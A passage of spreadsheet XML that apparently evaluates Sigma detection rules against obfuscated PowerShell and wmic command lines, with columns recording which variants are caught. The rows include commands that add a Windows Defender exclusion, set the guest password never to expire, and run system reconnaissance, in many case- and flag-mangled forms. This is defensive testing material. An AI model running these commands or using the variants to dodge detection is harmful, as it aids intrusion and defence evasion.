        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4130" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4130" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4130" s="43" t="n"/>
      <c r="J4130" s="43" t="n"/>
      <c r="K4130" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4131" ht="15.75" customHeight="1" s="42">
      <c r="A4131" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4131" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4131" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4131" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4131" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4131" s="43" t="n"/>
      <c r="J4131" s="43" t="n"/>
      <c r="K4131" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4132" ht="15.75" customHeight="1" s="42">
      <c r="A4132" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4132" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4132" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4132" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4132" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4132" s="43" t="n"/>
      <c r="J4132" s="43" t="n"/>
      <c r="K4132" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4133" ht="15.75" customHeight="1" s="42">
      <c r="A4133" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4133" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4133" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4133" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4133" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4133" s="43" t="n"/>
      <c r="J4133" s="43" t="n"/>
      <c r="K4133" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4134" ht="15.75" customHeight="1" s="42">
      <c r="A4134" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4134" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4134" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4134" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4134" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4134" s="43" t="n"/>
      <c r="J4134" s="43" t="n"/>
      <c r="K4134" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4135" ht="15.75" customHeight="1" s="42">
      <c r="A4135" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4135" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4135" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4135" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4135" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4135" s="43" t="n"/>
      <c r="J4135" s="43" t="n"/>
      <c r="K4135" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4136" ht="15.75" customHeight="1" s="42">
      <c r="A4136" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4136" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4136" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4136" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4136" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4136" s="43" t="n"/>
      <c r="J4136" s="43" t="n"/>
      <c r="K4136" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4137" ht="15.75" customHeight="1" s="42">
      <c r="A4137" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4137" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4137" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4137" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4137" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4137" s="43" t="n"/>
      <c r="J4137" s="43" t="n"/>
      <c r="K4137" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4138" ht="15.75" customHeight="1" s="42">
      <c r="A4138" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4138" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4138" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4138" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4138" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F4138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4138" s="43" t="n"/>
      <c r="J4138" s="43" t="n"/>
      <c r="K4138" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4139" ht="15.75" customHeight="1" s="42">
      <c r="A4139" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4139" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4139" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4139" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4139" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F4139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4139" s="43" t="n"/>
      <c r="J4139" s="43" t="n"/>
      <c r="K4139" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4140" ht="15.75" customHeight="1" s="42">
      <c r="A4140" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4140" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C4140" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4140" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E4140" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F4140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4140" s="43" t="n"/>
      <c r="J4140" s="43" t="n"/>
      <c r="K4140" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4141" ht="15.75" customHeight="1" s="42">
      <c r="A4141" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4141" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C4141" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4141" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E4141" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F4141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4141" s="43" t="n"/>
      <c r="J4141" s="43" t="n"/>
      <c r="K4141" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4142" ht="15.75" customHeight="1" s="42">
      <c r="A4142" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4142" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4142" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4142" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4142" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -coMmAnd "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F4142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4142" s="43" t="n"/>
      <c r="J4142" s="43" t="n"/>
      <c r="K4142" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4143" ht="15.75" customHeight="1" s="42">
      <c r="A4143" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4143" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4143" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4143" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4143" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -"Command" "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F4143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4143" s="43" t="n"/>
      <c r="J4143" s="43" t="n"/>
      <c r="K4143" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4144" ht="15.75" customHeight="1" s="42">
      <c r="A4144" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4144" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4144" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4144" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4144" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" /"Command" "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F4144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4144" s="43" t="n"/>
      <c r="J4144" s="43" t="n"/>
      <c r="K4144" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4145" ht="15.75" customHeight="1" s="42">
      <c r="A4145" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4145" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4145" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4145" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4145" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmMaND "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F4145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4145" s="43" t="n"/>
      <c r="J4145" s="43" t="n"/>
      <c r="K4145" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4146" ht="15.75" customHeight="1" s="42">
      <c r="A4146" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4146" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4146" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4146" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4146" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" /"Command" "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F4146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4146" s="43" t="n"/>
      <c r="J4146" s="43" t="n"/>
      <c r="K4146" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4147" ht="15.75" customHeight="1" s="42">
      <c r="A4147" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4147" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C4147" s="43" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4147" s="43" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E4147" s="43" t="inlineStr">
        <is>
          <t>wmic computersystem get model</t>
        </is>
      </c>
      <c r="F4147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4147" s="43" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE (9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f)</t>
        </is>
      </c>
      <c r="J4147" s="43" t="n"/>
      <c r="K4147" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4148" ht="15.75" customHeight="1" s="42">
      <c r="A4148" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4148" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C4148" s="43" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4148" s="43" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E4148" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-HotFix"</t>
        </is>
      </c>
      <c r="F4148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4148" s="43" t="n"/>
      <c r="J4148" s="43" t="n"/>
      <c r="K4148" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4149" ht="15.75" customHeight="1" s="42">
      <c r="A4149" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4149" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C4149" s="43" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4149" s="43" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E4149" s="43" t="inlineStr">
        <is>
          <t>wmic path win32_quickfixengineering get Caption, HotFixID, InstalledOn</t>
        </is>
      </c>
      <c r="F4149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4149" s="43" t="n"/>
      <c r="J4149" s="43" t="n"/>
      <c r="K4149" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4150" ht="15.75" customHeight="1" s="42">
      <c r="A4150" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4150" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_process</t>
        </is>
      </c>
      <c r="C4150" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4150" s="43" t="inlineStr">
        <is>
          <t>221b251a-357a-49a9-920a-271802777cc0</t>
        </is>
      </c>
      <c r="E4150" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "notepad.exe"</t>
        </is>
      </c>
      <c r="F4150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4150" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4150" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4150" s="43" t="n"/>
      <c r="K4150" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4151" ht="15.75" customHeight="1" s="42">
      <c r="A4151" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4151" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product</t>
        </is>
      </c>
      <c r="C4151" s="43" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4151" s="43" t="inlineStr">
        <is>
          <t>15434e33-5027-4914-88d5-3d4145ec25a9</t>
        </is>
      </c>
      <c r="E4151" s="43" t="inlineStr">
        <is>
          <t>wmic os get caption</t>
        </is>
      </c>
      <c r="F4151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4151" s="43" t="n"/>
      <c r="J4151" s="43" t="n"/>
      <c r="K4151" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4152" ht="15.75" customHeight="1" s="42">
      <c r="A4152" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4152" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4152" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4152" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4152" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /Namespace:\root\CIMV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4152" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4152" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4152" s="43" t="n"/>
      <c r="K4152" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4153" ht="15.75" customHeight="1" s="42">
      <c r="A4153" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4153" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4153" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4153" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4153" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4153" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4153" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4153" s="43" t="n"/>
      <c r="K4153" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4154" ht="15.75" customHeight="1" s="42">
      <c r="A4154" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4154" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4154" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4154" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4154" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmesPace:\RooT\CImV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4154" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4154" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4154" s="43" t="n"/>
      <c r="K4154" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4155" ht="15.75" customHeight="1" s="42">
      <c r="A4155" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4155" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4155" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4155" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4155" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmESPACE:\root\cimv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4155" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4155" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4155" s="43" t="n"/>
      <c r="K4155" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4156" ht="15.75" customHeight="1" s="42">
      <c r="A4156" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4156" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4156" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4156" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4156" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4156" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4156" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4156" s="43" t="n"/>
      <c r="K4156" s="43" t="b">
        <v>0</v>
      </c>
    </row>
